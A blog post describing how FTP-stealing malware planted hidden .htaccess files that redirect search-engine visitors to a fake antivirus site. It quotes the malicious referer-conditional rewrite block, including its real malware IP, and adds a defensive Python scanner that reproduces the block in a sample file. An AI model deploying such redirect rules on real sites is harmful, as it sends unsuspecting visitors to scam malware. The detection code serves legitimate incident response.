Ya, the title says it all. Some hacker got hold of the FTP logins for 20 of my website servers and uploaded .htaccess files that redirect people who find my sites through any search engine. The hacker was redirecting visitors coming from Google/MSN/Yahoo to some fake antivirus software site that just asks you to pay to remove your viruses (in other words, steals your money).


Here’s how it happened: someone in my network of computers (or me, who knows?) downloaded this nasty malware (information about it can be found here), or a newer version of it. Norton and Avast antivirus did absolutely nothing to pick this up. The malware sits on your system until you make an FTP connection, then uploads .htaccess files to all your sites on that FTP server. Funny thing: I even checked the .htaccess files last night and they looked like nothing but a big block of whitespace. These people actually put the code a few pages down in the file, trying to hide it:


```apache
# Malicious block as found in the uploaded .htaccess files: any visitor whose
# Referer header mentions a search engine is redirected off-site.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
```


That 89.28.13.201 IP address goes to the fake antivirus software site, which is more malware. So when people found my sites through the search engines and clicked through, they ended up on this malware site. Consequently all my sites got knocked out of the search engines for now (until they re-review them), since the sites got flagged for hosting malware (even though they only redirected to a different IP address). If you even attempt to access my sites through a search engine, it will stop you and warn you, which stops anyone from visiting.


What did I do to fix it? I installed Malwarebytes, and it found the bug right away. After that I had to re-upload all the correct .htaccess files so the sites would no longer be redirected (I also added a condition so my sites go to their www. addresses even if you don’t type the www. in the URL, for a few reasons including SEO). Then I had to go into Google Webmaster Tools, open each site, request a review, and explain what happened with the malware and how it was removed. FUN!
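Because the malicious block was buried a few pages down in the file, eyeballing the .htaccess files missed it. The following scanner is an added example (not code from the original post or from the author’s site) that parses .htaccess rewrite directives, groups each RewriteRule with the RewriteCond lines above it, and flags any rule that fires on the HTTP referer and sends visitors to a host that is not one of your own, reporting how many blank lines hid it. The sample .htaccess content, the `example.com` host names and the `SAMPLE_HTACCESS` / `find_referer_hijacks` names are constructed for this example; the first three lines of the sample are the kind of www-canonicalisation rule the post mentions, and the hidden block mirrors the one quoted above.

```python
import re
from urllib.parse import urlparse

# Directive, first two arguments, optional [flags]. Case-insensitive like Apache.
COND_RE = re.compile(r"^RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?\s*$", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample .htaccess (not the post author's real file): a legitimate
# www-canonicalisation block at the top, 200 blank lines of padding, then a
# referer-conditional redirect of the kind quoted in the post.
SAMPLE_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]\n"
    "RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]\n"
    + "\n" * 200
    + "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\n"
    "RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]\n"
)


def parse_rewrites(text):
    """Group every RewriteRule with the RewriteCond lines that precede it.

    Each result records the rule's line number, target, flags, its conditions,
    and the longest run of blank lines seen since the previous rule, which is
    the padding trick used to push the malicious block out of sight.
    """
    rules, conds = [], []
    blank_run = max_blank = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            blank_run += 1
            max_blank = max(max_blank, blank_run)
            continue
        blank_run = 0
        if line.startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            conds.append({"var": m.group(1), "pattern": m.group(2),
                          "flags": m.group(3) or ""})
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"line": lineno, "pattern": m.group(1),
                          "target": m.group(2), "flags": m.group(3) or "",
                          "conds": conds, "max_blank_before": max_blank})
            conds, max_blank = [], 0
            continue
        # Any other directive (RewriteEngine, Options, ...) is treated here as
        # ending a cond/rule group, so stray conditions do not leak forward.
        conds = []
    return rules


def find_referer_hijacks(text, own_hosts):
    """Flag RewriteRules that fire on the HTTP referer and redirect to a host
    that is not one of our own: the search-engine-only hijack pattern."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for rule in parse_rewrites(text):
        referer_conds = [c for c in rule["conds"]
                         if c["var"].upper() == "%{HTTP_REFERER}"]
        if not referer_conds:
            continue
        target = urlparse(rule["target"])
        if target.scheme not in ("http", "https"):
            continue  # internal rewrite, not an off-site redirect
        host = (target.hostname or "").lower()
        if host in own:
            continue
        findings.append({
            "line": rule["line"],
            "target": rule["target"],
            "host": host,
            "bare_ip": bool(IPV4_RE.match(host)),  # raw IP targets are a strong signal
            "referers": [c["pattern"] for c in referer_conds],
            "max_blank_before": rule["max_blank_before"],
        })
    return findings


if __name__ == "__main__":
    for hit in find_referer_hijacks(SAMPLE_HTACCESS, {"example.com", "www.example.com"}):
        print(f"line {hit['line']}: redirect to {hit['host']}"
              f"{' (bare IP)' if hit['bare_ip'] else ''} when referer matches "
              f"{hit['referers']}; hidden behind {hit['max_blank_before']} blank lines")
```

Run it over every .htaccess under each site’s document root (the malware touched all sites reachable from one FTP login, so check all of them, not just the one that was reported). One caveat from my side, not from the post: re-uploading clean files does not revoke whatever FTP credentials the malware captured while it waited for that FTP connection, so change those passwords before putting the clean files back, or the same files will simply be overwritten again.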
